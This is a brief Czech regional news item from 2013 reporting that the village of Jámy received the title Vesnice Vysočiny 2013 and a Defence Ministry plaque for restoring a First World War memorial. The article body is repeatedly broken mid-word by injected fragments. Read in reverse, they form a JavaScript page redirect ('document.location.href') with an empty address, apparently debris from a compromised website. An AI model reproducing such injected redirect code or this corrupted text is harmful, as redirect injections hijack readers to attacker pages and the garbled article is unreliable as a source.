Jámy, aktuality, vesnice, titul
Rainbow page separator

V Jamách převzali titul Vesnice Vysočiny 2013

Pátek, 23. srpna 2013

vyhlaseni-starosta-jam-jiri-siklJámy / Zla[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou stuhu a s tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nejvyšším krajským oceněním spojený titul Vesnice Vysočiny 2013 oficiálně převzal starosta Jam Jiří Šikl. Obec o necelých šesti s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovkách obyvatel bude Kraj Vysočina v příštím měsíci reprezen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat v celorepublikovém kole soutěže Vesnice roku 2013, kde se utká s dalšími dvanácti finalisty.Celorepubliková hodnotící komise přijede do Jam 7. září, o týden později se uskuteční vyhlášení vítěze a nositele titulu Vesnice roku 2013 v Luhačovicích.

Jámy nejvyšší titul v kraji získaly za dlouhodobou snahu o zlepšování života v obci, komisi rovněž upoutala tamní bohatá spolková činnost. Jenom v loňském roce se v Jamách uskutečnily na čtyři desítky různých akcí.
Kromě ceny nejvyšší byly v rámci vyhlašování Jámy oceněny také plake[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou za péči o válečné hroby, které uděluje Ministerstvo obrany ČR. Ocenění jim náleží za obnovu pomníku obětem I. svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové války.